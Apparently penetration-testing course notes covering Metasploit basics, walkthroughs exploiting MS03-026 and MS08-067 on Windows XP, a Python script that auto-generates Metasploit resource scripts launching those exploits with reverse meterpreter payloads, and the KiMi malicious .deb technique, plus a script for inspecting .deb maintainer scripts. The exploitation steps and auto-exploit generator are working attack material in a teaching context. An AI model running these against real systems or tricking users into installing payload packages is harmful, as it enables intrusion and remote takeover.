- Grade 2 Session 7
- ===================
- Metasploit Framework
- ====================
- Metasploit is a penetration testing platform that enables you to find, exploit, and validate vulnerabilities. Security researchers and penetration testers use it to exploit devices, machines, databases and servers.
- The tool is developed and maintained by Rapid7, with contributions from the open-source community.
- The Metasploit Framework we use is the free, open-source edition; Rapid7 also sells Metasploit Pro, a commercial version with extra features (web interface, automated workflows, reporting).
- MODULE TYPES :
- Payloads - code that runs on the target after a successful exploit (a shell, meterpreter, etc.)
- Exploits - code that triggers a specific vulnerability in order to deliver a payload
- Auxiliary - scanners, fuzzers, sniffers and other modules that do not deliver a payload
- Encoders - transform a payload to avoid bad characters (and naive signature matching)
- NOPs - no-operation sleds used to pad shellcode
- Post - post-exploitation modules run on an already compromised host
- Terminologies
- =============
- 1. Vulnerabilities
- 2. Exploit
- 3. Payload
- 4. Backdoor
- 5. Covering Traces
- Terms
- =====
- RHOST : Remote Host - the target's IP address, i.e. the machine we attack (newer Metasploit versions call this option RHOSTS and accept a list or range of addresses).
- RPORT : Remote Port - the port on the target on which the vulnerable service listens (usually pre-filled by the exploit module).
- LHOST : Listening Host - the attacker's IP address, on which the handler listens for the reverse connection.
- LPORT : Listening Port - the port on which the attacker's handler listens for the reverse connection.
- CONSOLE BASED EXPLOIT - 1
- ==========================
- Requirements :
- = Windows XP Service Pack 0 or Service Pack 1 (target)
- = Kali Linux (attacker)
- = Metasploit Framework
- LINK : https://www.exploit-db.com/exploits/66/
- DCOM (Distributed Component Object Model) is a protocol that lets software components communicate directly over a network. Its RPC interface listens on TCP port 135 by default on Windows NT-family systems such as Windows 2000 Server and Windows XP. The buffer overrun in that interface (MS03-026, CVE-2003-0352) affects unpatched Windows 2000, XP SP0/SP1 and Server 2003 and gives a remote attacker code execution as SYSTEM; the Metasploit module exploit/windows/dcerpc/ms03_026_dcom exploits it.
- Steps:
- ======
- 1. nmap -sS -sC -sV <IP Address> (the SYN scan needs root; look for 135/tcp open)
- 2. nmap -A -T4 <IP Address>
- 3. msfconsole
- 4. search for the corresponding exploit
- search dcom
- 5. use <path of the exploit found above>
- 6. show info - information about the exploit
- 7. show options - show the options of the exploit
- 8. set RHOST <target IP Address> (newer versions name this option RHOSTS; use the name that show options prints)
- 9. show options - confirm the target and the payload's LHOST/LPORT are set before launching
- 10. exploit
- CONSOLE BASED EXPLOIT - 2
- =========================
- Requirements :
- = Windows XP Service Pack 2 (target)
- = Kali Linux, updated (attacker)
- = Metasploit Framework
- Netapi32.dll is the library that implements the Windows Network API used by applications to access a Microsoft network. It is a core system component and should not be removed. The version shipped with Windows XP SP2 (and also Windows 2000, XP SP3 and Server 2003) contains a stack buffer overflow in the NetPathCanonicalize function (MS08-067, CVE-2008-4250) that a remote, unauthenticated attacker can trigger over SMB (TCP 445) to get code execution and remote access to the machine; the Metasploit module exploit/windows/smb/ms08_067_netapi exploits it.
- LINK : https://www.exploit-db.com/exploits/40279/
- Steps:
- ======
- 1. nmap -sS -sC -sV <IP Address>
- 2. nmap -A -T4 <IP Address>
- 3. msfconsole
- 4. search for the corresponding exploit
- search ms08_067 (or: search netapi)
- 5. use <path of the exploit found above>
- 6. show info --> information about the exploit
- 7. show options --> show the options of the exploit
- 8. set RHOST <target IP Address> (newer versions name this option RHOSTS; use the name that show options prints)
- 9. show options --> confirm the target and the payload's LHOST/LPORT are set before launching
- 10. exploit
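The two console procedures above share the same shape (scan, pick the module for the open port, set the target and listener options, launch). The script below automates that as an added example; it is not part of the session notes or of the Metasploit project. It parses nmap grepable output (the constructed sample stands in for a real scan), maps 135/tcp to exploit/windows/dcerpc/ms03_026_dcom and 445/tcp to exploit/windows/smb/ms08_067_netapi, and writes a resource script of use/set/exploit commands for `msfconsole -r`. The host addresses and the LHOST/LPORT values are placeholders.

```python
"""Turn nmap grepable output into a Metasploit resource script for the two exploits above.

Added example, not from the session notes or from the Metasploit project. It parses `nmap -oG`
output (the constructed sample below stands in for a real scan), picks the module for each
open port the notes cover (135/tcp -> ms03_026_dcom, 445/tcp -> ms08_067_netapi) and writes the
use/set/exploit commands to a resource script for `msfconsole -r`. The host addresses and the
LHOST/LPORT values are placeholders.
"""
import re

# Constructed sample of `nmap -sS -sV -O -oG - <target>` output; not a real scan.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated (constructed sample)
Host: 192.168.56.101 ()\tStatus: Up
Host: 192.168.56.101 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\tOS: Microsoft Windows XP SP2 or SP3
Host: 192.168.56.102 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9/, 445/closed/tcp//microsoft-ds///\tOS: Linux 4.X
"""

# Module per open port, mirroring the two console exercises above.
PORT_TO_MODULE = {
    135: "exploit/windows/dcerpc/ms03_026_dcom",  # MS03-026, RPC DCOM on TCP 135
    445: "exploit/windows/smb/ms08_067_netapi",   # MS08-067, netapi32 over SMB on TCP 445
}

# Grepable "Ports:" entries look like port/state/protocol/owner/service/rpcinfo/version/
_PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/[^/]*/([^/]*)/")


def parse_gnmap(text):
    """Return {ip: {"ports": {port: service}, "os": str}} for hosts with open TCP ports."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        ip = fields["Host"].split()[0]
        open_ports = {
            int(port): service
            for port, state, proto, service in _PORT_RE.findall(fields["Ports"])
            if state == "open" and proto == "tcp"
        }
        if open_ports:
            hosts[ip] = {"ports": open_ports, "os": fields.get("OS", "")}
    return hosts


def choose_modules(hosts):
    """Map each host to the exploit modules whose target port is open on it."""
    return {
        ip: [PORT_TO_MODULE[p] for p in sorted(info["ports"]) if p in PORT_TO_MODULE]
        for ip, info in hosts.items()
    }


def resource_script(plan, lhost, lport):
    """Emit msfconsole resource commands: one use/set/exploit block per host and module."""
    lines = [
        "# generated plan; run with: msfconsole -q -r msf_plan.rc",
        f"setg LHOST {lhost}",  # handler address, shared by every module below
        f"setg LPORT {lport}",
    ]
    for ip, modules in plan.items():
        for module in modules:
            lines += [
                f"use {module}",
                "set PAYLOAD windows/meterpreter/reverse_tcp",
                f"set RHOSTS {ip}",  # older Metasploit releases call this option RHOST
                "exploit -j -z",     # run as a background job, do not auto-interact
            ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    plan = choose_modules(parse_gnmap(SAMPLE_GNMAP))
    with open("msf_plan.rc", "w") as fh:
        fh.write(resource_script(plan, "192.168.56.1", 4444))
    print(resource_script(plan, "192.168.56.1", 4444))
```

Feed a real scan with `nmap -sS -sV -O -oG scan.gnmap <targets>` and pass the file contents to parse_gnmap. The script only plans by open port; confirm the service version from the scan before launching, since both modules will happily fire at a patched host.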
- KiMi Framework
- ==============
- KiMi is a tool for compromising Debian-based Linux systems through a malicious package. It is named after Kimimaro, a character from Naruto. The tool builds a malicious Debian package (.deb) that carries a Metasploit payload; we deliver the package to the target and ask them to install it. Installing a .deb runs the package's maintainer scripts (such as postinst) as root, so as soon as the target installs the package the payload runs and we receive a meterpreter session on our handler.
- We need to download this framework from GitHub:
- https://github.com/ChaitanyaHaritash/kimi
- STEPS :
- =======
- Copy the link
- Open the Linux terminal and type
- #git clone https://github.com/ChaitanyaHaritash/kimi.git
- #cd kimi
- #python kimi.py -h (help page; lists the options for generating the package)
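Why installing a package is enough to hand over a shell: a .deb is an ar archive whose control.tar.gz carries maintainer scripts that dpkg runs as root during installation. The script below is an added example, not kimi's code. It builds a minimal .deb whose postinst only leaves a marker (a malicious package would launch its payload from that script instead) and then shows the check a target should do before installing: list the maintainer scripts inside a .deb without installing it. The package name, version and marker command are placeholders.

```python
"""Build a .deb whose postinst runs at install time, then inspect a .deb for such scripts.

Added example; it is not kimi's code. A Debian binary package is an ar(1) archive with three
members: debian-binary, control.tar.gz (metadata and maintainer scripts) and data.tar.gz (the
files to install). dpkg runs the maintainer scripts (preinst, postinst, prerm, postrm) as root
while installing, which is the hook a malicious package uses. The package name, version and
the marker command in the demo postinst are placeholders chosen for this example.
"""
import io
import tarfile

MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")


def _ar_member(name, payload):
    """Encode one ar archive member: 60-byte header, data, newline pad to an even length."""
    header = (
        f"{name:<16}"          # member name
        f"{0:<12}"             # mtime (fixed so the output is reproducible)
        f"{0:<6}{0:<6}"        # uid, gid
        f"{'100644':<8}"       # mode, octal
        f"{len(payload):<10}"  # size in bytes
        "`\n"                  # header terminator
    ).encode()
    return header + payload + (b"\n" if len(payload) % 2 else b"")


def _targz(entries):
    """Pack {path: bytes} (None for a directory) into a gzip'd tar with dpkg-style ./ paths."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, content in entries.items():
            info = tarfile.TarInfo("./" + path)
            if content is None:
                info.type = tarfile.DIRTYPE
                info.mode = 0o755
                tar.addfile(info)
            else:
                info.size = len(content)
                # maintainer scripts must be executable or dpkg refuses to run them
                info.mode = 0o755 if path in MAINTAINER_SCRIPTS else 0o644
                tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def build_deb(pkg, version, postinst):
    """Return the bytes of a minimal .deb whose postinst script is `postinst`."""
    control = (
        f"Package: {pkg}\nVersion: {version}\nArchitecture: all\n"
        "Maintainer: demo <demo@example.invalid>\nDescription: demo package\n"
    ).encode()
    control_tar = _targz({"control": control, "postinst": postinst.encode()})
    data_tar = _targz({
        "usr/": None, "usr/share/": None, "usr/share/doc/": None,
        f"usr/share/doc/{pkg}/": None,
        f"usr/share/doc/{pkg}/README": b"demo package\n",
    })
    return (b"!<arch>\n"
            + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", control_tar)
            + _ar_member("data.tar.gz", data_tar))


def ar_members(blob):
    """Yield (name, data) for each member of an ar archive; ValueError if it is not one."""
    if blob[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        name = hdr[:16].decode().strip().rstrip("/")  # GNU ar suffixes names with '/'
        size = int(hdr[48:58])
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)                 # members are padded to even offsets


def maintainer_scripts(deb):
    """Return {script: text} for every maintainer script found in the control archive."""
    found = {}
    for name, data in ar_members(deb):
        if not name.startswith("control.tar"):
            continue
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
            for info in tar.getmembers():
                base = info.name.lstrip("./")
                if info.isfile() and base in MAINTAINER_SCRIPTS:
                    found[base] = tar.extractfile(info).read().decode()
    return found


if __name__ == "__main__":
    # A malicious package would launch its payload from this script; this one only leaves a marker.
    deb = build_deb("demo-pkg", "1.0", "#!/bin/sh\necho \"postinst ran as $(id -un)\"\n")
    with open("demo-pkg_1.0_all.deb", "wb") as fh:
        fh.write(deb)
    for script, text in maintainer_scripts(deb).items():
        print(f"== {script} ==\n{text}")
```

On a Debian system the same check is `dpkg-deb -I package.deb` (shows control information) or `dpkg-deb -e package.deb DEBIAN` (extracts the control files, scripts included) before any `dpkg -i`; a package from an untrusted source whose postinst launches anything beyond normal housekeeping is the tell.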
- https://www.offensive-security.com/metasploit-unleashed/